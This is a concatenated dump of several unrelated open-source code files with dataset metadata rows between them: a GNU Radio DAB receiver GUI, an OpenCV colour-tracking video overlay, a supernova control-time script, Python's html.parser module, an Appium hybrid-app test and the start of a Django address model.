help="resample by a fixed factor (fractional interpolation)")
parser.add_option("-S", "--autocorrect-sample-rate", action="store_true", default=False,
help="Estimate sample rate offset and resample (dynamic fractional interpolation)")
parser.add_option("-R", "--rx-subdev-spec", type="subdev", default=(0, 0),
help="select USRP Rx side A or B [default=A]")
parser.add_option("-f", "--freq", type="eng_float", default=227.36e6,
help="set frequency to FREQ [default=%default]")
parser.add_option("-r", "--sample-rate", type="int", default=2000000,
help="set sample rate to SAMPLE_RATE [default=%default]")
parser.add_option("-d", "--decim", type="intx", default=32,
help="set decimation rate to DECIM [default=%default]")
parser.add_option("-g", "--rx-gain", type="eng_float", default=None,
help="set receive gain in dB (default is midpoint)")
parser.add_option('-v', '--verbose', action="store_true", default=False,
help="verbose output")
parser.add_option('-a', '--antenna', type="string", default="TX/RX",
help="select antenna")
(options, args) = parser.parse_args()
self.verbose = options.verbose
if len(args) == 0:
if self.verbose:
print "--> receiving from USRP"
self.src = uhd.usrp_source("",uhd.io_type.COMPLEX_FLOAT32,1)
#self.src.set_mux(usrp.determine_rx_mux_value(self.src, options.rx_subdev_spec))
#self.subdev = usrp.selected_subdev(self.src, options.rx_subdev_spec)
#if self.verbose:
# print "--> using RX dboard " + self.subdev.side_and_name()
# tune frequency
self.frequency = options.freq
self.set_freq(options.freq)
# set gain
if options.rx_gain is None:
# if no gain was specified, use the mid-point in dB
g = self.src.get_gain_range()
options.rx_gain = float(g.start()+g.stop())/2
self.src.set_gain(options.rx_gain)
         self.sample_rate = 2e6  # self.src.adc_rate()/options.decim
self.src.set_samp_rate(self.sample_rate)
self.src.set_antenna(options.antenna)
else:
if self.verbose:
print "--> receiving from file: " + args[0]
self.filename = args[0]
self.src = blocks.file_source(gr.sizeof_gr_complex, self.filename, False)
self.sample_rate = options.sample_rate
self.dab_params = dab.parameters.dab_parameters(mode=options.dab_mode, sample_rate=self.sample_rate, verbose=options.verbose)
self.rx_params = dab.parameters.receiver_parameters(mode=options.dab_mode, softbits=True, input_fft_filter=options.filter_input, autocorrect_sample_rate=options.autocorrect_sample_rate, sample_rate_correction_factor=options.resample_fixed, verbose=options.verbose, correct_ffe=options.correct_ffe, equalize_magnitude=options.equalize_magnitude)
self.demod = dab.ofdm_demod(self.dab_params, self.rx_params, verbose=self.verbose)
self.v2s = blocks.vector_to_stream(gr.sizeof_gr_complex, self.dab_params.num_carriers)
self.scope = scopesink2.scope_sink_c(self.panel, title="DAB constellation sink", sample_rate=self.dab_params.sample_rate, xy_mode=True)
self.trigsink = blocks.null_sink(gr.sizeof_char)
self.sink = blocks.null_sink(gr.sizeof_float*self.dab_params.num_carriers*2)
self.connect(self.src, self.demod, self.sink)
self.connect((self.demod,1), self.trigsink)
# build GUI
self.connect(self.demod.deinterleave, self.v2s, self.scope)
vbox.Add(self.scope.win, 10, wx.EXPAND)
self.wxgui_fftsink2_0 = fftsink2.fft_sink_c(
self.panel,
baseband_freq=0,
y_per_div=10,
y_divs=10,
ref_level=0,
ref_scale=2.0,
sample_rate=self.sample_rate,
fft_size=1024,
fft_rate=15,
average=False,
avg_alpha=None,
title="FFT Plot",
peak_hold=False,
)
vbox.Add(self.wxgui_fftsink2_0.win)
self.connect((self.src, 0), (self.wxgui_fftsink2_0, 0))
# retune USRP to correct FFE?
self.correct_ffe_usrp = options.correct_ffe_usrp
if self.correct_ffe_usrp:
print "--> correcting FFE on USRP"
self.run_correct_ffe_thread = True
self.ffe_updater = threading.Timer(0.1, self.correct_ffe)
self.ffe_updater.setDaemon(True)
self.ffe_updater.start()
def correct_ffe(self):
while self.run_correct_ffe_thread:
diff = self.demod.sync.ffs_sample_and_average_arg.ffe_estimate()
if abs(diff) > self.rx_params.usrp_ffc_min_deviation:
self.frequency -= diff*self.rx_params.usrp_ffc_adapt_factor
print "--> updating fine frequency correction: " + str(self.frequency)
self.set_freq(self.frequency)
time.sleep(1./self.rx_params.usrp_ffc_retune_frequency)
def set_freq(self, freq):
if self.src.set_center_freq(freq):
if self.verbose:
print "--> retuned to " + str(freq) + " Hz"
return True
else:
print "-> error - cannot tune to " + str(freq) + " Hz"
return False
if __name__ == '__main__':
app = stdgui2.stdapp(usrp_dab_gui_rx, "usrp_dab_gui_rx", nstatus=1)
app.MainLoop()
| gpl-3.0 | 8,074,108,952,524,165,000 | 38.54321 | 346 | 0.685295 | false |
reliableJARED/python | opencv/video_on_video_overlay_tracked_obj.py | 1 | 4338 | '''
This code will put a video on a colored object (like a green ball) in the main
video stream. It will resize the overlay video on the fly
based on how big the tracked object is. The code will not work without
the file: hist_for_tracking.png
which is the 'color calibration' image. The program does allow you
to calibrate to any color: press 'x' while an image is in the
green box shown on the screen and it will recalibrate to
that and update 'hist_for_tracking.png'. You also need something to overlay: replace
'video1.mp4' with whatever video or image you want to overlay on the tracked object.
I can show you how to use this program if you're
looking for this type of application. It's just a basic demo.
'''
#need sys import to use any no python env files like common.py
import sys
sys.path.append('/home/jared/PythonWork/opencv')
import cv2 #NOTE: this is from OpenCV
import numpy as np
#get video frame
frame = cv2.VideoCapture(0)
def read_overlay():
vid = cv2.VideoCapture('video1.mp4')
return vid
while (True):
#get pic to be used as tracking histogram
roi = cv2.imread('hist_for_tracking.png')
search_hsv = cv2.cvtColor(roi,cv2.COLOR_BGR2HSV)
#get next video frame
check, img = frame.read()
#this try/except if is used to start the overlay video, and keep looping it
try:
check2, track_img = vid.read()
except:
vid = read_overlay()
check2, track_img = vid.read()
if check2 == False:
vid = read_overlay()
check2, track_img = vid.read()
#when check2 == False, the vid is over.
find_hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
#calculate histogram of color to look for
#calcHist([image],[channel],mask,[histogram bin count(256 full)],range(256 full))
roihist = cv2.calcHist([search_hsv],[0,1], None, [50,256], [0,180,0,256] )
#ORIGINAL:
#roihist = cv2.calcHist([search_hsv],[0,1], None, [180,256], [0,180,0,256] )
# normalize histogram and apply backprojection
cv2.normalize(roihist,roihist,0,255,cv2.NORM_MINMAX)
dst = cv2.calcBackProject([find_hsv],[0,1],roihist,[0,180,0,256],1)
    # Smooth the backprojection by convolving it with a small elliptical
    # (disc-shaped) kernel; this suppresses speckle noise before thresholding
disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))
cv2.filter2D(dst,-1,disc,dst)
#Find all the blobs that match tracked color
#using dst as input will be looking for black and white as dst has no color
contours, hier = cv2.findContours(dst,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
#determine which contour is the largest
    big_area = 0
    big_shape = None
    for shape in contours:
        check = cv2.contourArea(shape)
        if check > big_area:
            #set new biggest area
            big_area = check
            #identify largest shape so that x,y is known
            big_shape = shape
    if big_shape is not None:
if 10<cv2.contourArea(big_shape):
#determine shape of a rectangle that would enclose the obj
(x,y,w,h) = cv2.boundingRect(big_shape)
#read image to be displayed
if check2==True:
pic = track_img
#resize image based on boundingRect() coordinates
new_dimensions = (int(w),int(h))
new_pic = cv2.resize(pic,new_dimensions,interpolation=cv2.INTER_AREA)
img[y:y+h,x:x+w]=new_pic
if check2 == False:
vid.release()
# threshold and binary AND
ret,thresh = cv2.threshold(dst,50,255,0)
thresh = cv2.merge((thresh,thresh,thresh))
resb = cv2.bitwise_and(img, thresh)
cv2.imshow('color_select',resb)
#put rectangle on screen where screen shot will grab from
cv2.rectangle(img,(250,200),(350,300),(0,255,0),2)
cv2.imshow('live',img)
ScreenShot = cv2.waitKey(25)& 0xFF
if ScreenShot == ord('x'):
#if 'x' is pressed
#displays a screen shot of image in rectangle
#saves it for use in histogram[y:y,x:x]
cv2.imshow('Color2Track',img[200:300,250:350])
cv2.imwrite('hist_for_tracking.png',img[200:300,250:350])
if cv2.waitKey(25) &0xFF== ord('q'):
#when everything done, release the capture
frame.release()
cv2.destroyAllWindows()
break
| gpl-3.0 | -4,845,308,143,406,473,000 | 35.453782 | 90 | 0.638774 | false |
cosmodesi/snsurvey | src/control.py | 1 | 1120 | #!/usr/bin/env python
import numpy
import sncosmo
import scipy.optimize
import matplotlib.pyplot as plt
model=sncosmo.Model(source='salt2-extended')
def f(t, rlim):
# print t, model.bandflux('desr',t, zp = rlim, zpsys='ab')
return model.bandflux('desr',t, zp = rlim, zpsys='ab')-1.
def controlTime(z, rlim):
model.set(z=z, t0=55000.)
model.set_source_peakabsmag(absmag=-19.3,band='bessellb',magsys='ab')
    pre = scipy.optimize.fsolve(f, 55000. - 15*(1+z), args=(rlim,), xtol=1e-8)
    post = scipy.optimize.fsolve(f, 55000. + 20*(1+z), args=(rlim,), xtol=1e-8)
return max(post[0]-pre[0],0)
# print scipy.optimize.fsolve(f, 55000.+40,args=(rlim),factor=1.,xtol=1e-8)
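# Example (hypothetical numbers): days a z = 0.1 supernova stays brighter than
# an r-band limiting magnitude of 20.5:
#
#   ct = controlTime(0.1, 20.5)  # control time in days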
def plot():
lmag = numpy.arange(19.5,21.6,0.5)
zs = numpy.arange(0.02, 0.2501,0.02)
ans = []
for lm in lmag:
ans_=[]
for z in zs:
ans_.append(controlTime(z,lm))
ans.append(ans_)
for lm, ct in zip(lmag, ans):
plt.plot(zs, ct, label = '$r_{{lim}} = {}$'.format(str(lm)))
plt.xlabel(r'$z$')
plt.ylabel(r'control time (days)')
plt.legend()
plt.show()
| bsd-3-clause | -1,581,675,154,253,889,500 | 26.317073 | 79 | 0.605357 | false |
prefetchnta/questlab | bin/x64bin/python/37/Lib/html/parser.py | 1 | 18191 | """A parser for HTML and XHTML."""
# This file is based on sgmllib.py, but the API is slightly different.
# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special).
import re
import warnings
import _markupbase
from html import unescape
__all__ = ['HTMLParser']
# Regular expressions used for parsing
interesting_normal = re.compile('[&<]')
incomplete = re.compile('&[a-zA-Z#]')
entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
charref = re.compile('&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]')
starttagopen = re.compile('<[a-zA-Z]')
piclose = re.compile('>')
commentclose = re.compile(r'--\s*>')
# Note:
# 1) if you change tagfind/attrfind remember to update locatestarttagend too;
# 2) if you change tagfind/attrfind and/or locatestarttagend the parser will
# explode, so don't do it.
# see http://www.w3.org/TR/html5/tokenization.html#tag-open-state
# and http://www.w3.org/TR/html5/tokenization.html#tag-name-state
tagfind_tolerant = re.compile(r'([a-zA-Z][^\t\n\r\f />\x00]*)(?:\s|/(?!>))*')
attrfind_tolerant = re.compile(
r'((?<=[\'"\s/])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?(?:\s|/(?!>))*')
locatestarttagend_tolerant = re.compile(r"""
<[a-zA-Z][^\t\n\r\f />\x00]* # tag name
(?:[\s/]* # optional whitespace before attribute name
(?:(?<=['"\s/])[^\s/>][^\s/=>]* # attribute name
(?:\s*=+\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|"[^"]*" # LIT-enclosed value
|(?!['"])[^>\s]* # bare value
)
(?:\s*,)* # possibly followed by a comma
)?(?:\s|/(?!>))*
)*
)?
\s* # trailing whitespace
""", re.VERBOSE)
endendtag = re.compile('>')
# the HTML 5 spec, section 8.1.2.2, doesn't allow spaces between
# </ and the tag name, so maybe this should be fixed
endtagfind = re.compile(r'</\s*([a-zA-Z][-.a-zA-Z0-9:_]*)\s*>')
class HTMLParser(_markupbase.ParserBase):
"""Find tags and other markup and call handler functions.
Usage:
p = HTMLParser()
p.feed(data)
...
p.close()
Start tags are handled by calling self.handle_starttag() or
self.handle_startendtag(); end tags by self.handle_endtag(). The
data between tags is passed from the parser to the derived class
by calling self.handle_data() with the data as argument (the data
may be split up in arbitrary chunks). If convert_charrefs is
True the character references are converted automatically to the
corresponding Unicode character (and self.handle_data() is no
longer split in chunks), otherwise they are passed by calling
self.handle_entityref() or self.handle_charref() with the string
containing respectively the named or numeric reference as the
argument.
"""
CDATA_CONTENT_ELEMENTS = ("script", "style")
def __init__(self, *, convert_charrefs=True):
"""Initialize and reset this instance.
If convert_charrefs is True (the default), all character references
are automatically converted to the corresponding Unicode characters.
"""
self.convert_charrefs = convert_charrefs
self.reset()
def reset(self):
"""Reset this instance. Loses all unprocessed data."""
self.rawdata = ''
self.lasttag = '???'
self.interesting = interesting_normal
self.cdata_elem = None
_markupbase.ParserBase.reset(self)
def feed(self, data):
r"""Feed data to the parser.
Call this as often as you want, with as little or as much text
as you want (may include '\n').
"""
self.rawdata = self.rawdata + data
self.goahead(0)
def close(self):
"""Handle any buffered data."""
self.goahead(1)
__starttag_text = None
def get_starttag_text(self):
"""Return full source of start tag: '<...>'."""
return self.__starttag_text
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
def clear_cdata_mode(self):
self.interesting = interesting_normal
self.cdata_elem = None
# Internal -- handle data as far as reasonable. May leave state
# and data to be processed by a subsequent call. If 'end' is
# true, force handling all data as if followed by EOF marker.
def goahead(self, end):
rawdata = self.rawdata
i = 0
n = len(rawdata)
while i < n:
if self.convert_charrefs and not self.cdata_elem:
j = rawdata.find('<', i)
if j < 0:
# if we can't find the next <, either we are at the end
# or there's more text incoming. If the latter is True,
# we can't pass the text to handle_data in case we have
# a charref cut in half at end. Try to determine if
# this is the case before proceeding by looking for an
# & near the end and see if it's followed by a space or ;.
amppos = rawdata.rfind('&', max(i, n-34))
if (amppos >= 0 and
not re.compile(r'[\s;]').search(rawdata, amppos)):
break # wait till we get all the text
j = n
else:
match = self.interesting.search(rawdata, i) # < or &
if match:
j = match.start()
else:
if self.cdata_elem:
break
j = n
if i < j:
if self.convert_charrefs and not self.cdata_elem:
self.handle_data(unescape(rawdata[i:j]))
else:
self.handle_data(rawdata[i:j])
i = self.updatepos(i, j)
if i == n: break
startswith = rawdata.startswith
if startswith('<', i):
if starttagopen.match(rawdata, i): # < + letter
k = self.parse_starttag(i)
elif startswith("</", i):
k = self.parse_endtag(i)
elif startswith("<!--", i):
k = self.parse_comment(i)
elif startswith("<?", i):
k = self.parse_pi(i)
elif startswith("<!", i):
k = self.parse_html_declaration(i)
elif (i + 1) < n:
self.handle_data("<")
k = i + 1
else:
break
if k < 0:
if not end:
break
k = rawdata.find('>', i + 1)
if k < 0:
k = rawdata.find('<', i + 1)
if k < 0:
k = i + 1
else:
k += 1
if self.convert_charrefs and not self.cdata_elem:
self.handle_data(unescape(rawdata[i:k]))
else:
self.handle_data(rawdata[i:k])
i = self.updatepos(i, k)
elif startswith("&#", i):
match = charref.match(rawdata, i)
if match:
name = match.group()[2:-1]
self.handle_charref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
else:
if ";" in rawdata[i:]: # bail by consuming &#
self.handle_data(rawdata[i:i+2])
i = self.updatepos(i, i+2)
break
elif startswith('&', i):
match = entityref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_entityref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
match = incomplete.match(rawdata, i)
if match:
# match.group() will contain at least 2 chars
if end and match.group() == rawdata[i:]:
k = match.end()
if k <= i:
k = n
i = self.updatepos(i, i + 1)
# incomplete
break
elif (i + 1) < n:
# not the end of the buffer, and can't be confused
# with some other construct
self.handle_data("&")
i = self.updatepos(i, i + 1)
else:
break
else:
assert 0, "interesting.search() lied"
# end while
if end and i < n and not self.cdata_elem:
if self.convert_charrefs and not self.cdata_elem:
self.handle_data(unescape(rawdata[i:n]))
else:
self.handle_data(rawdata[i:n])
i = self.updatepos(i, n)
self.rawdata = rawdata[i:]
# Internal -- parse html declarations, return length or -1 if not terminated
# See w3.org/TR/html5/tokenization.html#markup-declaration-open-state
# See also parse_declaration in _markupbase
def parse_html_declaration(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<!', ('unexpected call to '
'parse_html_declaration()')
if rawdata[i:i+4] == '<!--':
# this case is actually already handled in goahead()
return self.parse_comment(i)
elif rawdata[i:i+3] == '<![':
return self.parse_marked_section(i)
elif rawdata[i:i+9].lower() == '<!doctype':
# find the closing >
gtpos = rawdata.find('>', i+9)
if gtpos == -1:
return -1
self.handle_decl(rawdata[i+2:gtpos])
return gtpos+1
else:
return self.parse_bogus_comment(i)
# Internal -- parse bogus comment, return length or -1 if not terminated
# see http://www.w3.org/TR/html5/tokenization.html#bogus-comment-state
def parse_bogus_comment(self, i, report=1):
rawdata = self.rawdata
assert rawdata[i:i+2] in ('<!', '</'), ('unexpected call to '
'parse_comment()')
pos = rawdata.find('>', i+2)
if pos == -1:
return -1
if report:
self.handle_comment(rawdata[i+2:pos])
return pos + 1
# Internal -- parse processing instr, return end or -1 if not terminated
def parse_pi(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<?', 'unexpected call to parse_pi()'
match = piclose.search(rawdata, i+2) # >
if not match:
return -1
j = match.start()
self.handle_pi(rawdata[i+2: j])
j = match.end()
return j
# Internal -- handle starttag, return end or -1 if not terminated
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind_tolerant.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = match.group(1).lower()
while k < endpos:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
# Internal -- check to see if we have a complete starttag; return end
# or -1 if incomplete.
def check_for_whole_start_tag(self, i):
rawdata = self.rawdata
m = locatestarttagend_tolerant.match(rawdata, i)
if m:
j = m.end()
next = rawdata[j:j+1]
if next == ">":
return j + 1
if next == "/":
if rawdata.startswith("/>", j):
return j + 2
if rawdata.startswith("/", j):
# buffer boundary
return -1
# else bogus input
if j > i:
return j
else:
return i + 1
if next == "":
# end of input
return -1
if next in ("abcdefghijklmnopqrstuvwxyz=/"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
# end of input in or before attribute value, or we have the
# '/' from a '/>' ending
return -1
if j > i:
return j
else:
return i + 1
raise AssertionError("we should not get here!")
# Internal -- parse endtag, return end or -1 if incomplete
def parse_endtag(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == "</", "unexpected call to parse_endtag"
match = endendtag.search(rawdata, i+1) # >
if not match:
return -1
gtpos = match.end()
match = endtagfind.match(rawdata, i) # </ + tag + >
if not match:
if self.cdata_elem is not None:
self.handle_data(rawdata[i:gtpos])
return gtpos
# find the name: w3.org/TR/html5/tokenization.html#tag-name-state
namematch = tagfind_tolerant.match(rawdata, i+2)
if not namematch:
# w3.org/TR/html5/tokenization.html#end-tag-open-state
if rawdata[i:i+3] == '</>':
return i+3
else:
return self.parse_bogus_comment(i)
tagname = namematch.group(1).lower()
# consume and ignore other stuff between the name and the >
# Note: this is not 100% correct, since we might have things like
            # </tag attr=">">, but looking for > after the name should cover
# most of the cases and is much simpler
gtpos = rawdata.find('>', namematch.end())
self.handle_endtag(tagname)
return gtpos+1
elem = match.group(1).lower() # script or style
if self.cdata_elem is not None:
if elem != self.cdata_elem:
self.handle_data(rawdata[i:gtpos])
return gtpos
self.handle_endtag(elem)
self.clear_cdata_mode()
return gtpos
# Overridable -- finish processing of start+end tag: <tag.../>
def handle_startendtag(self, tag, attrs):
self.handle_starttag(tag, attrs)
self.handle_endtag(tag)
# Overridable -- handle start tag
def handle_starttag(self, tag, attrs):
pass
# Overridable -- handle end tag
def handle_endtag(self, tag):
pass
# Overridable -- handle character reference
def handle_charref(self, name):
pass
# Overridable -- handle entity reference
def handle_entityref(self, name):
pass
# Overridable -- handle data
def handle_data(self, data):
pass
# Overridable -- handle comment
def handle_comment(self, data):
pass
# Overridable -- handle declaration
def handle_decl(self, decl):
pass
# Overridable -- handle processing instruction
def handle_pi(self, data):
pass
def unknown_decl(self, data):
pass
# Internal -- helper to remove special character quoting
def unescape(self, s):
warnings.warn('The unescape method is deprecated and will be removed '
'in 3.5, use html.unescape() instead.',
DeprecationWarning, stacklevel=2)
return unescape(s)
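# A minimal usage sketch (not part of the module): subclass HTMLParser and
# override the handler callbacks; feed() drives them as the markup is parsed.
#
#   class DemoParser(HTMLParser):
#       def handle_starttag(self, tag, attrs):
#           print("start:", tag, attrs)
#       def handle_data(self, data):
#           print("data:", data)
#
#   DemoParser().feed('<p class="x">hi</p>')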
| lgpl-2.1 | -4,034,221,794,916,283,000 | 36.704255 | 80 | 0.490792 | false |
spedepekka/testdroid-samples | appium/sample-scripts/python/testdroid_android_hybrid.py | 1 | 9582 | ##
## For help on setting up your machine and configuring this TestScript go to
## http://docs.testdroid.com/appium/
##
import os
import time
import unittest
import subprocess
from time import sleep
from appium import webdriver
from device_finder import DeviceFinder
from selenium.common.exceptions import WebDriverException
from selenium.common.exceptions import NoSuchElementException
from appium.common.exceptions import NoSuchContextException
def log(msg):
print (time.strftime("%H:%M:%S") + ": " + msg)
class TestdroidAndroid(unittest.TestCase):
"""
Take screenshot and store files to defined location, with numbering prefix
:Args:
- name - files are stored as #_name
"""
def screenshot(self, name):
screenshot_name = str(self.screenshot_count) + "_" + name + ".png"
log("Taking screenshot: " + screenshot_name)
# on Android, switching context to NATIVE_APP for screenshot
# taking to get screenshots also stored to Testdroid Cloud
# device run view. After screenshot switching back to WEBVIEW.
if not "NATIVE_APP" in self.driver.current_context:
self.driver.switch_to.context("NATIVE_APP")
self.driver.save_screenshot(self.screenshot_dir + "/" + screenshot_name)
contexts = self.driver.contexts
self.driver.switch_to.context(self.driver.contexts[-1])
else:
self.driver.save_screenshot(self.screenshot_dir + "/" + screenshot_name)
self.screenshot_count += 1
"""
Search for specified xpath for defined period
:Args:
- xpath - the xpath to search for
- timeout - duration in seconds to search for given xpath
- step - how often to search run the search
:Usage:
self.wait_until_xpath_matches("//div[@id='example']", 15, 2)"
"""
def wait_until_xpath_matches(self, xpath, timeout=10, step=1):
end_time = time.time() + timeout
found = False
while (time.time() < end_time and not found):
log(" Looking for xpath {}".format(xpath))
try:
element = self.driver.find_element_by_xpath(xpath)
found = True
except NoSuchElementException:
found = False
time.sleep(step)
if not found:
raise NoSuchElementException("Element wiht xpath: '{}' not found in {}s".format(xpath, timeout))
return element
def setUp(self):
##
## IMPORTANT: Set the following parameters.
## You can set the parameters outside the script with environment variables.
## If env var is not set the string after or is used.
##
testdroid_url = os.environ.get('TESTDROID_URL') or "https://cloud.testdroid.com"
appium_url = os.environ.get('TESTDROID_APPIUM_URL') or 'http://appium.testdroid.com/wd/hub'
testdroid_apiKey = os.environ.get('TESTDROID_APIKEY') or ""
testdroid_project = os.environ.get('TESTDROID_PROJECT') or 'Android hybrid sample project'
testdroid_testrun = os.environ.get('TESTDROID_TESTRUN') or 'My testrun'
testdroid_app = os.environ.get('TESTDROID_APP') or ""
app_package = os.environ.get('TESTDROID_APP_PACKAGE') or 'com.testdroid.sample.android'
app_activity = os.environ.get('TESTDROID_ACTIVITY') or '.MM_MainMenu'
new_command_timeout = os.environ.get('TESTDROID_CMD_TIMEOUT') or '60'
testdroid_test_timeout = os.environ.get('TESTDROID_TEST_TIMEOUT') or '600'
self.screenshot_dir = os.environ.get('TESTDROID_SCREENSHOTS') or os.getcwd() + "/screenshots"
log ("Will save screenshots at: " + self.screenshot_dir)
self.screenshot_count = 1
# Options to select device
# 1) Set environment variable TESTDROID_DEVICE
# 2) Set device name to this python script
# 3) Do not set #1 and #2 and let DeviceFinder to find free device for you
testdroid_device = os.environ.get('TESTDROID_DEVICE') or ""
deviceFinder = DeviceFinder(url=testdroid_url)
if testdroid_device == "":
# Loop will not exit until free device is found
while testdroid_device == "":
testdroid_device = deviceFinder.available_android_device()
if "localhost" in appium_url:
            self.api_level = int(subprocess.check_output(["adb", "shell", "getprop ro.build.version.sdk"]))
else:
            self.api_level = int(deviceFinder.device_API_level(testdroid_device))
log("Device API level is %s" % self.api_level)
log("Starting Appium test using device '%s'" % testdroid_device)
desired_capabilities_cloud = {}
desired_capabilities_cloud['testdroid_apiKey'] = testdroid_apiKey
if self.api_level > 16:
desired_capabilities_cloud['testdroid_target'] = 'android'
desired_capabilities_cloud['automationName'] = 'android'
else:
desired_capabilities_cloud['testdroid_target'] = 'selendroid'
desired_capabilities_cloud['automationName'] = 'selendroid'
desired_capabilities_cloud['testdroid_apiKey'] = testdroid_apiKey
desired_capabilities_cloud['testdroid_project'] = testdroid_project
desired_capabilities_cloud['testdroid_testrun'] = testdroid_testrun
desired_capabilities_cloud['testdroid_device'] = testdroid_device
desired_capabilities_cloud['testdroid_app'] = testdroid_app
desired_capabilities_cloud['appPackage'] = app_package
desired_capabilities_cloud['appActivity'] = app_activity
desired_capabilities_cloud['platformName'] = 'Android'
desired_capabilities_cloud['deviceName'] = 'Android Phone'
desired_capabilities_cloud['newCommandTimeout'] = new_command_timeout
desired_capabilities_cloud['testdroid_testTimeout'] = testdroid_test_timeout
# set up webdriver
log ("WebDriver request initiated. Waiting for response, this typically takes 2-3 mins")
self.driver = webdriver.Remote(appium_url, desired_capabilities_cloud)
log ("WebDriver response received")
def tearDown(self):
log ("Quitting")
self.driver.quit()
def testSample(self):
log (" Getting device screen size")
log (" " + str(self.driver.get_window_size()))
isSelendroid = None
if self.api_level < 17:
isSelendroid = True
self.screenshot("app_launch")
log ("Checking API level. This test works only on API 19 and above.")
log ("API level: " + str(self.api_level))
if self.api_level < 19:
raise Exception("The chosen device has API level under 19. The Hybrid view will crash.")
log ('Clicking button "hybrid app"')
element = self.driver.find_element_by_id('com.testdroid.sample.android:id/mm_b_hybrid')
element.click()
self.screenshot('hybrid_activity')
log('Typing in the url http://docs.testdroid.com')
element=self.driver.find_element_by_id('com.testdroid.sample.android:id/hy_et_url')
element.send_keys("http://docs.testdroid.com")
self.screenshot('url_typed')
try:
log ("Hiding keyboard")
self.driver.hide_keyboard()
except WebDriverException:
pass # pass exception, if keyboard isn't visible already
self.screenshot('keyboard_hidden')
log('Clicking Load url button')
element = self.driver.find_element_by_id('com.testdroid.sample.android:id/hy_ib_loadUrl')
element.click()
self.screenshot('webpage_loaded')
contexts = "undefined"
end_time = time.time() + 30
while "undefined" in str(contexts) and time.time() < end_time:
contexts = self.driver.contexts
log(str(contexts))
sleep(5)
context = str(contexts[-1])
log ("Context will be " + context)
self.driver.switch_to.context(context)
log ("Context is " + self.driver.current_context)
log("Finding 'search button'")
end_time = time.time() + 30
element = None
while not element and time.time() < end_time:
# wait up to 10s to get search results
element = self.wait_until_xpath_matches('//input[@id="search"]', 10)
log("Clicking search field")
element.send_keys("appium")
self.screenshot("search_text")
log("Click search")
element = self.driver.find_element_by_xpath('//input[@class="search-button"]')
element.click()
log ("Look for result text heading")
# workaround, since h1 doesn't include all the text in one text() element
end_time = time.time() + 30
while time.time() < end_time:
# wait up to 10s to get search results
element = self.wait_until_xpath_matches('//h1[contains(text(), "Search results")]', 10)
if "appium" in element.text:
end_time = time.time()
self.screenshot("search_title_present")
log ("Verify correct heading text")
log ("h1 text: " + str(element.text))
self.assertTrue("Search results for \"appium\"" in str(element.text))
self.driver.switch_to.context("NATIVE_APP")
log('Going back')
self.driver.back()
self.screenshot('launch_screen')
def initialize():
return TestdroidAndroid
if __name__ == "__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(TestdroidAndroid)
unittest.TextTestRunner(verbosity=2).run(suite)
| apache-2.0 | 8,970,575,629,305,151,000 | 39.09205 | 108 | 0.635775 | false |
aykut/django-oscar | oscar/apps/address/abstract_models.py | 1 | 7907 | import zlib
from django.db import models
from django.utils.translation import ugettext_lazy as _
class AbstractAddress(models.Model):
"""
Superclass address object
This is subclassed and extended to provide models for
user, shipping and billing addresses.
The only required fields are last_name, line1 and postcode.
"""
# @todo: Need a way of making these choice lists configurable
# per project
MR, MISS, MRS, MS, DR = ('Mr', 'Miss', 'Mrs', 'Ms', 'Dr')
TITLE_CHOICES = (
(MR, _("Mr")),
(MISS, _("Miss")),
(MRS, _("Mrs")),
(MS, _("Ms")),
(DR, _("Dr")),
)
title = models.CharField(_("Title"), max_length=64, choices=TITLE_CHOICES, blank=True)
first_name = models.CharField(_("First name"), max_length=255, blank=True)
last_name = models.CharField(_("Last name"), max_length=255)
# We use quite a few lines of an address as they are often quite long and
# it's easier to just hide the unnecessary ones than add extra ones.
line1 = models.CharField(_("First line of address"), max_length=255)
line2 = models.CharField(_("Second line of address"), max_length=255, blank=True)
line3 = models.CharField(_("Third line of address"), max_length=255, blank=True)
line4 = models.CharField(_("City"), max_length=255, blank=True)
state = models.CharField(_("State/County"), max_length=255, blank=True)
postcode = models.CharField(_("Post/Zip-code"), max_length=64)
country = models.ForeignKey('address.Country')
